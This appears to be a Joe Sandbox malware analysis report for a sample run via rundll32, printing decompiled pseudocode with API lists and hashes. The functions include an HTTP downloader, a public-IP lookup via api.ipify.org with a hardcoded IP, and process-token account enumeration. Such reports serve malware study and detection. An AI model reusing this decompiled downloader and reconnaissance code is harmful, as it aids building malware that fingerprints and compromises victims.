                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                          • String ID:
                          • API String ID: 3775504709-0
                          • Opcode ID: 0bc254eba02334ef7dc36b75a804ccdfdaf775d7ac590fa51e19ce1371687533
                          • Instruction ID: d2417c79c150777cc50850b3a5de11832d3f9c752946885f019167cf1cecc3a6
                          • Opcode Fuzzy Hash: 0bc254eba02334ef7dc36b75a804ccdfdaf775d7ac590fa51e19ce1371687533
                          • Instruction Fuzzy Hash: F1F0447C984145CFEB23EB25F8974153366EB49700762CC31E511C3AD4DA3858268EE4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D1FE0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 89%
                          			E042D1FE0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
				void* _v8;
				long _v12;
				void* _v16;
				signed short _v20;
				signed int _v24;
				void _v28;
				void _v32;
				void* _v36;
				long _v40;
				long _v44;
				int _v48;
				intOrPtr _v60;
				char* _v64;
				signed short _v84;
				intOrPtr _v88;
				char* _v92;
				long _v96;
				void* _v108;
				char _v368;
				char _v628;
				int _t79;
				void* _t80;
				void* _t83;
				void* _t141;

				E042D14A0( &_v108, 0, 0x3c);
				_v108 = 0x3c;
				_v92 =  &_v368;
				_v88 = 0x104;
				_v64 =  &_v628;
				_v60 = 0x104;
				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
				if(_t79 != 0) {
					if(_v96 == 0) {
						_v96 = 3;
					}
					if(_v96 == 3 || _v96 == 4) {
						_t80 = E042D24F0(); // executed
						_v36 = _t80;
						if(_v36 != 0) {
							_v20 = _v84;
							_v24 = 0x84080100;
							if(_v96 == 4) {
								_v24 = _v24 | 0x00803000;
							}
							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
							_v16 = _t83;
							if(_v16 != 0) {
								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x42d7050, _v24, 1);
								if(_v8 != 0) {
									if(_v96 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
										_v28 = _v28 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
									}
									HttpSendRequestA(_v8, 0, 0, 0, 0);
									_v32 = 0;
									_v44 = 4;
									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
									if(_v32 != 0xc8 || _a8 == 0) {
										L26:
										InternetCloseHandle(_v8); // executed
										InternetCloseHandle(_v16);
										if(_v32 != 0xc8) {
											return 0;
										}
										return 1;
									} else {
										 *_a16 = 0;
										while(1 != 0) {
											_v48 = InternetReadFile(_v8, _a8, _a12,  &_v12);
											if(_v48 != 1 || _v12 <= 0) {
												goto L26;
											} else {
												_a8 = _a8 + _v12;
												_a12 = _a12 - _v12;
												 *_a16 =  *_a16 + _v12;
												continue;
											}
										}
										goto L26;
									}
								}
								InternetCloseHandle(_v16);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}



























                          0x042d1ff1
                          0x042d1ff9
                          0x042d2006
                          0x042d2009
                          0x042d2016
                          0x042d2019
                          0x042d2028
                          0x042d2038
                          0x042d204c
                          0x042d2054
                          0x042d2061
                          0x042d2063
                          0x042d2063
                          0x042d206e
                          0x042d207d
                          0x042d2082
                          0x042d2089
                          0x042d2096
                          0x042d209a
                          0x042d20a5
                          0x042d20b0
                          0x042d20b0
                          0x042d20cd
                          0x042d20d3
                          0x042d20da
                          0x042d2108
                          0x042d210f
                          0x042d2126
                          0x042d2128
                          0x042d213d
                          0x042d214b
                          0x042d215a
                          0x042d215a
                          0x042d216c
                          0x042d2172
                          0x042d2179
                          0x042d2193
                          0x042d21a0
                          0x042d2204
                          0x042d2208
                          0x042d2212
                          0x042d221f
                          0x00000000
                          0x042d2228
                          0x00000000
                          0x042d21a8
                          0x042d21ab
                          0x042d21b1
                          0x042d21d0
                          0x042d21d7
                          0x00000000
                          0x042d21df
                          0x042d21e5
                          0x042d21ee
                          0x042d21fc
                          0x00000000
                          0x042d2202
                          0x042d21d7
                          0x00000000
                          0x042d21b1
                          0x042d21a0
                          0x042d2115
                          0x00000000
                          0x042d20dc
                          0x00000000
                          0x042d20dc
                          0x042d20da
                          0x00000000
                          0x042d2076
                          0x00000000
                          0x042d2076
                          0x042d206e
                          0x00000000

                          APIs
                          • InternetCrackUrlA.WININET(042D1AD9,00000000,00000000,0000003C), ref: 042D204C
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternet
                          • String ID: <$GET
                          • API String ID: 1381609488-427699995
                          • Opcode ID: 5e41b86bd99b2a17133c77d2b327c3618a2cc0e2505757e44bf3fe79c26b8090
                          • Instruction ID: 31b5ba0e61ee95beb94ffa2d6675933e973740188f750f85d02d3e69b39735bf
                          • Opcode Fuzzy Hash: 5e41b86bd99b2a17133c77d2b327c3618a2cc0e2505757e44bf3fe79c26b8090
                          • Instruction Fuzzy Hash: 6C713D74E10209EFEB14DFD4D849BEEB7B4FB48701F108599E611AB284E7B5AA44CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02838C80 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 86%
                          			E02838C80(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x2838df8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E027D9264("Delphi%.8X", 0,  &_v16,  &_v8);
				E027D413C(0x2865ba4, _v8);
				_t25 =  *0x2865ba4; // 0x41d10ac
				_t27 = GlobalAddAtomA(E027D45A8(_t25)); // executed
				 *0x2865ba0 = _t27;
				_t29 =  *0x2865668; // 0x27d0000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E027D9264("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E027D413C(0x2865ba8, _v20);
				_t35 =  *0x2865ba8; // 0x41d10c8
				 *0x2865ba2 = GlobalAddAtomA(E027D45A8(_t35));
				_t38 =  *0x2865ba8; // 0x41d10c8
				 *0x2865bac = RegisterClipboardFormatA(E027D45A8(_t38));
				 *0x2865be4 = E027EB488(1);
				E02838884();
				 *0x2865b94 = E028386A0(1, 1);
				_t47 = E0281B694(0, 1, __edi);
				_t78 =  *0x2864774; // 0x2865b5c
				 *_t78 = _t47;
				_t49 = E0281CD08(0, 1);
				_t80 =  *0x28645d4; // 0x2865b58
				 *_t80 = _t49;
				_t50 =  *0x28645d4; // 0x2865b58
				E0281EC60( *_t50, 1); // executed
				_t53 =  *0x2828054; // 0x2828058
				E027EA9A0(_t53, 0x282a7d0, 0x282a7e0);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x2863eb8 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x2838dff);
				E027D40E8( &_v20);
				return E027D40E8( &_v8);
			}

























                          0x02838c89
                          0x02838c8c
                          0x02838c91
                          0x02838c92
                          0x02838c97
                          0x02838c9a
                          0x02838ca6
                          0x02838ca9
                          0x02838cb7
                          0x02838cc4
                          0x02838cc9
                          0x02838cd4
                          0x02838cd9
                          0x02838ce3
                          0x02838ce8
                          0x02838ceb
                          0x02838cf4
                          0x02838cf7
                          0x02838d08
                          0x02838d15
                          0x02838d1a
                          0x02838d2a
                          0x02838d30
                          0x02838d40
                          0x02838d51
                          0x02838d56
                          0x02838d67
                          0x02838d75
                          0x02838d7a
                          0x02838d80
                          0x02838d8b
                          0x02838d90
                          0x02838d96
                          0x02838d98
                          0x02838da1
                          0x02838db0
                          0x02838db5
                          0x02838dc4
                          0x02838dc8
                          0x02838dd5
                          0x02838dd5
                          0x02838ddc
                          0x02838ddf
                          0x02838de2
                          0x02838dea
                          0x02838df7

                          APIs
                          • GetCurrentProcessId.KERNEL32(?,00000000,02838DF8), ref: 02838CA1
                          • GlobalAddAtomA.KERNEL32(00000000), ref: 02838CD4
                          • GetCurrentThreadId.KERNEL32 ref: 02838CEF
                          • GlobalAddAtomA.KERNEL32(00000000), ref: 02838D25
                          • RegisterClipboardFormatA.USER32(00000000), ref: 02838D3B
                            • Part of subcall function 027EB488: RtlInitializeCriticalSection.KERNEL32(027E89FC,?,?,027F4BA5,00000000,027F4BC9), ref: 027EB4A7
                            • Part of subcall function 02838884: SetErrorMode.KERNEL32(00008000), ref: 0283889D
                            • Part of subcall function 02838884: GetModuleHandleA.KERNEL32(USER32,00000000,028389EA,?,00008000), ref: 028388C1
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 028388CE
                            • Part of subcall function 02838884: LoadLibraryA.KERNEL32(imm32.dll,00000000,028389EA,?,00008000), ref: 028388EA
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0283890C
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 02838921
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 02838936
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0283894B
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 02838960
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 02838975
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0283898A
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0283899F
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 028389B4
                            • Part of subcall function 02838884: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 028389C9
                            • Part of subcall function 02838884: SetErrorMode.KERNEL32(?,028389F1,00008000), ref: 028389E4
                            • Part of subcall function 0281B694: GetKeyboardLayout.USER32(00000000), ref: 0281B6E8
                            • Part of subcall function 0281B694: GetDC.USER32(00000000), ref: 0281B74F
                            • Part of subcall function 0281B694: GetDeviceCaps.GDI32(?,0000005A), ref: 0281B75D
                            • Part of subcall function 0281B694: ReleaseDC.USER32(00000000,?), ref: 0281B76E
                            • Part of subcall function 0281CD08: LoadIconA.USER32(00000000,MAINICON), ref: 0281CE21
                            • Part of subcall function 0281CD08: GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,MAINICON), ref: 0281CE60
                            • Part of subcall function 0281CD08: OemToCharA.USER32(?,?), ref: 0281CE73
                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02838DF8), ref: 02838DBF
                          • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02838DD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$Module$AtomCurrentErrorGlobalHandleLoadMode$CapsCharClipboardCriticalDeviceFileFormatIconInitializeKeyboardLayoutLibraryNameProcessRegisterReleaseSectionThread
                          • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                          • API String ID: 1913790723-1126952177
                          • Opcode ID: 2d9be5d0fed8e0c34a2637c65070092e1732ee6760d760ced4d7cc30259f0aee
                          • Instruction ID: 3588d25cb63c3cd95a4c6e9994dfe99c86123aa41b9eaa6f1399290d0780ebc9
                          • Opcode Fuzzy Hash: 2d9be5d0fed8e0c34a2637c65070092e1732ee6760d760ced4d7cc30259f0aee
                          • Instruction Fuzzy Hash: C24160BCD402459FCB02EFB8E84994E77FAEF19300B505865E501DB380DB79A914CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281C1EC Relevance: 10.6, APIs: 7, Instructions: 96COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 89%
                          			E0281C1EC(intOrPtr __eax, void* __edi) {
				intOrPtr _v8;
				char _v9;
				struct tagLOGFONTA _v69;
				struct tagLOGFONTA _v189;
				struct tagLOGFONTA _v249;
				void _v409;
				void* _t32;
				void* _t41;
				intOrPtr _t52;
				struct HFONT__* _t55;
				struct HFONT__* _t60;
				struct HFONT__* _t65;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;

				_t86 = __edi;
				_t88 = _t89;
				_t90 = _t89 + 0xfffffe68;
				_v8 = __eax;
				_v9 = 0;
				if( *0x2865b58 != 0) {
					_t71 =  *0x2865b58; // 0x41d1544
					_t3 = _t71 + 0x88; // 0x1
					_v9 =  *_t3;
				}
				_push(_t88);
				_push(0x281c349);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				if( *0x2865b58 != 0) {
					_t69 =  *0x2865b58; // 0x41d1544
					E0281EC60(_t69, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v69, 0) == 0) {
					_t32 = GetStockObject(0xd);
					_t10 = _v8 + 0x84; // 0x7681089
					E027F7694( *_t10, _t32, _t86);
				} else {
					_t65 = CreateFontIndirectA( &_v69); // executed
					_t8 = _v8 + 0x84; // 0x7681089
					E027F7694( *_t8, _t65, _t86);
				}
				_v409 = 0x154;
				if(SystemParametersInfoA(0x29, 0,  &_v409, 0) == 0) {
					_t20 = _v8 + 0x80; // 0x6459595a
					E027F7778( *_t20, 8);
					_t41 = GetStockObject(0xd);
					_t22 = _v8 + 0x88; // 0x8d0281d7
					E027F7694( *_t22, _t41, _t86);
				} else {
					_t55 = CreateFontIndirectA( &_v189);
					_t15 = _v8 + 0x80; // 0x6459595a
					E027F7694( *_t15, _t55, _t86);
					_t60 = CreateFontIndirectA( &_v249);
					_t18 = _v8 + 0x88; // 0x8d0281d7
					E027F7694( *_t18, _t60, _t86);
				}
				_t24 = _v8 + 0x80; // 0x6459595a
				E027F74D8( *_t24, 0xff000017);
				_t26 = _v8 + 0x88; // 0x8d0281d7
				E027F74D8( *_t26, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x281c350);
				if( *0x2865b58 != 0) {
					_t52 =  *0x2865b58; // 0x41d1544
					return E0281EC60(_t52, _v9);
				}
				return 0;
			}





















                          0x0281c1ec
                          0x0281c1ed
                          0x0281c1ef
                          0x0281c1f5
                          0x0281c1f8
                          0x0281c203
                          0x0281c205
                          0x0281c20a
                          0x0281c210
                          0x0281c210
                          0x0281c215
                          0x0281c216
                          0x0281c21b
                          0x0281c21e
                          0x0281c228
                          0x0281c22c
                          0x0281c231
                          0x0281c231
                          0x0281c247
                          0x0281c266
                          0x0281c270
                          0x0281c276
                          0x0281c249
                          0x0281c24d
                          0x0281c257
                          0x0281c25d
                          0x0281c25d
                          0x0281c27b
                          0x0281c299
                          0x0281c2d8
                          0x0281c2e3
                          0x0281c2ea
                          0x0281c2f4
                          0x0281c2fa
                          0x0281c29b
                          0x0281c2a2
                          0x0281c2ac
                          0x0281c2b2
                          0x0281c2be
                          0x0281c2c8
                          0x0281c2ce
                          0x0281c2ce
                          0x0281c302
                          0x0281c30d
                          0x0281c315
                          0x0281c320
                          0x0281c32a
                          0x0281c32d
                          0x0281c339
                          0x0281c33e
                          0x00000000
                          0x0281c343
                          0x0281c348

                          APIs
                          • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0281C240
                          • CreateFontIndirectA.GDI32(?), ref: 0281C24D
                          • GetStockObject.GDI32(0000000D), ref: 0281C266
                            • Part of subcall function 027F7778: MulDiv.KERNEL32(00000000,?,00000048), ref: 027F7785
                          • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0281C292
                          • CreateFontIndirectA.GDI32(?), ref: 0281C2A2
                          • CreateFontIndirectA.GDI32(?), ref: 0281C2BE
                          • GetStockObject.GDI32(0000000D), ref: 0281C2EA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                          • String ID:
                          • API String ID: 2891467149-0
                          • Opcode ID: e6758a2f0dcd606444bc82707363902cdfa0acd15c7327071679bb322703b20b
                          • Instruction ID: d901b259e43450d93b3496ff3863e06334eae83cc8d0b973bb9df38a43398126
                          • Opcode Fuzzy Hash: e6758a2f0dcd606444bc82707363902cdfa0acd15c7327071679bb322703b20b
                          • Instruction Fuzzy Hash: 99318D38A442489FEB56EBA8D889FAD77FAAB08700F5544F1E608E7390DB709D04CF11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D3400 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 209 42d3400-42d3428 call 42d14a0 GetModuleHandleA 212 42d342e-42d3444 GetProcAddress 209->212 213 42d342a-42d342c 209->213 215 42d344f-42d3453 GetSystemInfo 212->215 216 42d3446-42d344d GetNativeSystemInfo 212->216 214 42d346b-42d346e 213->214 217 42d3459-42d3460 215->217 216->217 218 42d3469 217->218 219 42d3462-42d3467 217->219 218->214 219->214
                          C-Code - Quality: 75%
                          			E042D3400() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				struct _SYSTEM_INFO _v48;

				E042D14A0( &_v48, 0, 0x24);
				_v8 = GetModuleHandleA("kernel32.dll");
				if(_v8 != 0) {
					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
					if(_v12 == 0) {
						GetSystemInfo( &_v48);
					} else {
						_v12( &_v48);
					}
					if((_v48.dwOemId & 0x0000ffff) != 9) {
						return 0;
					} else {
						return 1;
					}
				}
				return 0;
			}






                          0x042d340e
                          0x042d3421
                          0x042d3428
                          0x042d343d
                          0x042d3444
                          0x042d3453
                          0x042d3446
                          0x042d344a
                          0x042d344a
                          0x042d3460
                          0x00000000
                          0x042d3462
                          0x00000000
                          0x042d3462
                          0x042d3460
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,042D1B21), ref: 042D341B
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 042D3437
                          • GetNativeSystemInfo.KERNEL32(?), ref: 042D344A
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleInfoModuleNativeProcSystem
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 3469989633-192647395
                          • Opcode ID: 66ed67831d481e2339f9dcbe2361a92a7845a5cce31d55b0f90a6e1cfae2911f
                          • Instruction ID: 6a5536dca4f46574cb9d7b3fdb3f9244e600345e580de5f45bf7cf24a99009a0
                          • Opcode Fuzzy Hash: 66ed67831d481e2339f9dcbe2361a92a7845a5cce31d55b0f90a6e1cfae2911f
                          • Instruction Fuzzy Hash: 2C013135F24208EBCB04EFF8D8497EDB778EB08715F108555E901B3180E7B8A684DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D3000 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 220 42d3000-42d301e OpenProcess 221 42d3027-42d303c OpenProcessToken 220->221 222 42d3020-42d3022 220->222 224 42d303e-42d3040 221->224 225 42d3045-42d3062 GetTokenInformation 221->225 223 42d30e7-42d30ea 222->223 224->223 226 42d306f-42d3071 225->226 227 42d3064-42d306d GetLastError 225->227 226->223 227->226 228 42d3073-42d30a9 call 42d1390 GetTokenInformation 227->228 231 42d30d8-42d30e4 call 42d13d0 228->231 232 42d30ab-42d30cf LookupAccountSidA 228->232 231->223 232->231 233 42d30d1 232->233 233->231
                          C-Code - Quality: 100%
                          			E042D3000(long _a4, CHAR* _a8, long _a12, CHAR* _a16, long _a20) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				union _TOKEN_INFORMATION_CLASS _v28;
				union _SID_NAME_USE _v32;
				int _t31;
				int _t37;
				int _t43;

				_v12 = OpenProcess(0x400, 0, _a4);
				if(_v12 != 0) {
					if(OpenProcessToken(_v12, 0x20008,  &_v16) != 0) {
						_v8 = 0;
						_t31 = GetTokenInformation(_v16, 1, 0, 0,  &_v8); // executed
						if(_t31 != 0 || GetLastError() != 0x7a) {
							return 0;
						} else {
							_v24 = E042D1390(_v8);
							_v20 = _v24;
							_v28 = 0;
							_t37 = GetTokenInformation(_v16, 1, _v20, _v8,  &_v8); // executed
							if(_t37 != 0) {
								_t43 = LookupAccountSidA(0,  *_v20, _a8,  &_a12, _a16,  &_a20,  &_v32); // executed
								if(_t43 != 0) {
									_v28 = 1;
								}
							}
							E042D13D0(_v24);
							return _v28;
						}
					}
					return 0;
				}
				return 0;
			}













                          0x042d3017
                          0x042d301e
                          0x042d303c
                          0x042d3045
                          0x042d305a
                          0x042d3062
                          0x00000000
                          0x042d3073
                          0x042d307f
                          0x042d3085
                          0x042d3088
                          0x042d30a1
                          0x042d30a9
                          0x042d30c7
                          0x042d30cf
                          0x042d30d1
                          0x042d30d1
                          0x042d30cf
                          0x042d30dc
                          0x00000000
                          0x042d30e4
                          0x042d3062
                          0x00000000
                          0x042d303e
                          0x00000000

                          APIs
                          • OpenProcess.KERNEL32(00000400,00000000,?,?,042D2E45,?,?,00000104,?,00000104), ref: 042D3011
                          • OpenProcessToken.ADVAPI32(00000000,00020008,00000104,?,042D2E45,?,?,00000104), ref: 042D3034
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenProcess$Token
                          • String ID:
                          • API String ID: 2935449343-0
                          • Opcode ID: 8f756d990a35a04452e1589c451821e6a46e457bbac1431f7b40fd499ed9b7b8
                          • Instruction ID: c599ebdf473c171294246533d35e892961e86a04394a548ae2d621e8ca240817
                          • Opcode Fuzzy Hash: 8f756d990a35a04452e1589c451821e6a46e457bbac1431f7b40fd499ed9b7b8
                          • Instruction Fuzzy Hash: D8312CB5F10209AFDB04DFE4DC85FBEB7B8AB48705F108558EA05E7280E775AA44CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2520 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 42stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 236 42d2520-42d2535 237 42d254d-42d255d call 42d1fe0 236->237 238 42d2537-42d254b lstrcpyA 236->238 241 42d2562-42d2568 237->241 239 42d25aa-42d25ad 238->239 242 42d258a-42d25a8 lstrcpyA 241->242 243 42d256a-42d2588 lstrcpyA 241->243 242->239 243->239
                          C-Code - Quality: 100%
                          			E042D2520(void* __ecx, CHAR* _a4) {
				char _v8;
				void* _t10;

				if( *0x042D7280 == 0) {
					_t10 = E042D1FE0("http://api.ipify.org", "102.129.143.14", 0x20,  &_v8); // executed
					if(_t10 != 1) {
						 *((char*)(0x42d7280)) = 0;
						lstrcpyA(_a4, "0.0.0.0");
						return 0;
					}
					 *((char*)(_v8 + 0x42d7280)) = 0;
					lstrcpyA(_a4, "102.129.143.14");
					return 1;
				}
				lstrcpyA(_a4, "102.129.143.14");
				return 1;
			}





                          0x042d2535
                          0x042d255d
                          0x042d2568
                          0x042d2592
                          0x042d25a2
                          0x00000000
                          0x042d25a8
                          0x042d256d
                          0x042d257d
                          0x00000000
                          0x042d2583
                          0x042d2540
                          0x00000000

                          APIs
                          • lstrcpyA.KERNEL32(042D1AD9,102.129.143.14,?,?,042D1AD9,?,?), ref: 042D2540
                          • lstrcpyA.KERNEL32(042D1AD9,102.129.143.14,?,?,042D1AD9,?,?), ref: 042D257D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: 0.0.0.0$102.129.143.14$http://api.ipify.org
                          • API String ID: 3722407311-3804530074
                          • Opcode ID: 84c7cf088e994eeb734b961846980cd6c8c61e10ee2c2ab5064667f5a2a049a6
                          • Instruction ID: 0bb392b68f2c01df501e35792473f58666c293e163d2ee4a62262e3d28f9fffb
                          • Opcode Fuzzy Hash: 84c7cf088e994eeb734b961846980cd6c8c61e10ee2c2ab5064667f5a2a049a6
                          • Instruction Fuzzy Hash: 0C01F934724241EBD7189EA8D81DFA97BA8EF44740F404294F504DB281DABFF9448BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281CD08 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 94%
                          			E0281CD08(intOrPtr __ecx, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				char* _v20;
				char _v276;
				void* __ebp;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t82;
				struct HINSTANCE__** _t100;
				struct HICON__* _t102;
				intOrPtr _t107;
				struct HINSTANCE__** _t109;
				char* _t125;
				intOrPtr _t135;
				intOrPtr* _t143;
				intOrPtr* _t144;
				intOrPtr _t145;
				char _t148;
				void* _t169;
				void* _t170;

				_t148 = __edx;
				_t145 = __ecx;
				if(__edx != 0) {
					_t170 = _t170 + 0xfffffff0;
					_t78 = E027D3570(_t78, _t169);
				}
				_v16 = _t145;
				_v9 = _t148;
				_v8 = _t78;
				E027F3854(_v16, 0);
				_t81 =  *0x2864528; // 0x2863594
				if( *((short*)(_t81 + 2)) == 0) {
					_t144 =  *0x2864528; // 0x2863594
					 *((intOrPtr*)(_t144 + 4)) = _v8;
					 *_t144 = E0281E6B0;
				}
				_t82 =  *0x28645f4; // 0x286359c
				if( *((short*)(_t82 + 2)) == 0) {
					_t143 =  *0x28645f4; // 0x286359c
					 *((intOrPtr*)(_t143 + 4)) = _v8;
					 *_t143 = E0281E8B8;
				}
				 *((char*)(_v8 + 0x34)) = 0;
				 *((intOrPtr*)(_v8 + 0x90)) = E027D31DC(1);
				 *((intOrPtr*)(_v8 + 0xa8)) = E027D31DC(1);
				 *((intOrPtr*)(_v8 + 0x60)) = 0;
				 *((intOrPtr*)(_v8 + 0x84)) = 0;
				 *((intOrPtr*)(_v8 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_v8 + 0x78)) = 0x1f4;
				 *((char*)(_v8 + 0x7c)) = 1;
				 *((intOrPtr*)(_v8 + 0x80)) = 0;
				 *((intOrPtr*)(_v8 + 0x74)) = 0x9c4;
				 *((char*)(_v8 + 0x88)) = 0;
				 *((char*)(_v8 + 0x9d)) = 1;
				 *((char*)(_v8 + 0xb4)) = 1;
				 *((intOrPtr*)(_v8 + 0x98)) = E027FDE00(1);
				_t100 =  *0x2864424; // 0x2865030
				_t102 = LoadIconA( *_t100, "MAINICON"); // executed
				E027FE1D0( *((intOrPtr*)(_v8 + 0x98)), _t102);
				_t107 =  *((intOrPtr*)(_v8 + 0x98));
